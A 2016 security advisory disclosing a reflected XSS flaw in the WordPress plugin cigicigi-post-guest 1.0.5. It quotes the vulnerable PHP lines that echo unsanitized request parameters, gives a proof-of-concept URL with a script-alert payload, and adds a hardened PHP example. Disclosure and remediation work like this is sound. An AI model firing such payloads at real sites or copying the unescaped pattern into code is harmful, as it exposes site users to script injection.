Advisory #: 463
Title: Reflected XSS in WordPress plugin cigicigi-post-guest v1.0.5
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/cigicigi-post-guest
Downloads: 4535
Vendor Notified: 2016-02-09
Vendor Contact: plugins@wordpress.org
Plugin Name: cigicigi-post-guest
Vulnerability:
There is a reflected XSS vulnerability in the following PHP code in ./cigicigi-post-guest/cigicigi_post_guest.php:

580: <a class="next-page" href="admin.php?page=cigicigi_post_guest_posts&sayfa=<?php echo $s; ?>&do=<?php echo $_GET['do']; ?>"><?php echo $s; ?></a>
642: <a class="next-page" href="admin.php?page=cigicigi_post_guest_posts&sayfa=<?php echo $s; ?>&do=<?php echo $_GET['do']; ?>"><?php echo $s; ?></a>
663: <input type="button" value="<< <?php _e('Back', 'cigicigi-post-guest'); ?>" onclick=parent.location="admin.php?page=cigicigi_post_guest_posts&sayfa=<?php echo $_GET['sayfa']; ?>">
664: <input type="button" value="<?php _e('Edit'); ?>" onclick=parent.location="admin.php?page=cigicigi_post_guest_posts&sayfa=<?php echo $_GET['sayfa']; ?>&do=edit&id=<?php echo $single_cigi_post_sorgu[0]->ID; ?>">
665: <input type="button" class="cigicigi_delete_button" value="<?php _e('Delete'); ?>" onclick="delete_confirm('admin.php?page=cigicigi_post_guest_posts&sayfa=<?php echo $_GET['sayfa']; ?>&do=delete&id=<?php echo $single_cigi_post_sorgu[0]->ID; ?>')">
666: <input type="button" class="cigicigi_publish_button" value="<?php _e('Publish'); ?>" onclick=parent.location="admin.php?page=cigicigi_post_guest_posts&sayfa=<?php echo $_GET['sayfa']; ?>&do=publish&id=<?php echo $single_cigi_post_sorgu[0]->ID; ?>">
700: <form method="POST" action="admin.php?page=cigicigi_post_guest_posts&sayfa=<?php echo $_GET['sayfa']; ?>&do=edit&id=<?php echo $_GET['id']; ?>" id="cigicigi_post_guest_form" enctype="multipart/form-data">
751: <input type="button" class="cigicigi_post_guest_submit" value="<< <?php _e('Back', 'cigicigi-post-guest'); ?>" onclick=parent.location="admin.php?page=cigicigi_post_guest_posts&sayfa=<?php echo $_GET['sayfa']; ?>">
773: <input type="button" value="<< <?php _e('Back', 'cigicigi-post-guest'); ?>" onclick=parent.location="admin.php?page=cigicigi_post_guest_posts&sayfa=<?php echo $_GET['sayfa']; ?>">
816: <input type="button" value="<< <?php _e('Back', 'cigicigi-post-guest'); ?>" onclick=parent.location="admin.php?page=cigicigi_post_guest_posts&sayfa=<?php echo $_GET['sayfa']; ?>">
821: <input type="button" value="<< <?php _e('Back', 'cigicigi-post-guest'); ?>" onclick=parent.location="admin.php?page=cigicigi_post_guest_posts&sayfa=<?php echo $_GET['sayfa']; ?>">
827: <input type="button" value="<< <?php _e('Back', 'cigicigi-post-guest'); ?>" onclick=parent.location="admin.php?page=cigicigi_post_guest_posts&sayfa=<?php echo $_GET['sayfa']; ?>">
859: <input type="button" value="<< <?php _e('Back', 'cigicigi-post-guest'); ?>" onclick=parent.location="admin.php?page=cigicigi_post_guest_posts&sayfa=<?php echo $_GET['sayfa']; ?>">

The variables do, sayfa and id appear to send unsanitized data back to the user's browser.
CVE-ID: Not Released
File: ./cigicigi-post-guest/cigicigi_post_guest.php
Exploit Code:
The exploit was derived from the first vulnerable parameter to appear in the code; the lines shown above may contain more.
This is an untested autogenerated exploit:
http://[target]/wp-content/plugins/cigicigi-post-guest/cigicigi_post_guest.php?do=<script>alert(1);</script>
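
A hardened form of the pattern in the quoted lines, as an added example that is not code from the plugin or from the advisory: sayfa and id are forced to integers, do is checked against an allowlist, and the URL is encoded and HTML-escaped on output. The helper names and the allowlist (edit, delete, publish, taken from the values visible in the quoted lines) are assumptions.

```php
<?php
// Added example, not the plugin's code. Plain PHP so it runs from the CLI;
// inside WordPress, absint(), add_query_arg(), esc_url() and esc_attr()
// are the usual equivalents for these steps.

// Assumption: the only 'do' actions are the ones visible in the quoted lines.
const ALLOWED_ACTIONS = ['edit', 'delete', 'publish'];

/** Return a non-negative integer for page numbers and post IDs, else 0. */
function clean_int(array $query, string $key): int
{
    $value = $query[$key] ?? '';
    return (is_string($value) && ctype_digit($value)) ? (int) $value : 0;
}

/** Return the action only if it is on the allowlist, else an empty string. */
function clean_action(array $query): string
{
    $value = $query['do'] ?? '';
    return (is_string($value) && in_array($value, ALLOWED_ACTIONS, true)) ? $value : '';
}

/** Build the admin URL from validated values and escape it for an HTML attribute. */
function posts_url(array $query, array $extra = []): string
{
    $args = ['page' => 'cigicigi_post_guest_posts', 'sayfa' => clean_int($query, 'sayfa')];
    if (($action = clean_action($query)) !== '') {
        $args['do'] = $action;
    }
    $url = 'admin.php?' . http_build_query($args + $extra);
    return htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
}

// Constructed request: the string from the advisory's test URL in 'do' and 'sayfa'.
$get = ['do' => '<script>alert(1);</script>', 'sayfa' => '<script>alert(1);</script>'];

// Pattern from the advisory (line 580): the raw parameter lands in the markup.
echo 'before: <a class="next-page" href="admin.php?page=cigicigi_post_guest_posts&do='
    . $get['do'] . '">', PHP_EOL;

// Hardened: rejected values are dropped, everything else is encoded and escaped.
echo 'after:  <a class="next-page" href="' . posts_url($get) . '">', PHP_EOL;
echo 'valid:  <a class="next-page" href="'
    . posts_url(['do' => 'edit', 'sayfa' => '3'], ['id' => 7]) . '">', PHP_EOL;
```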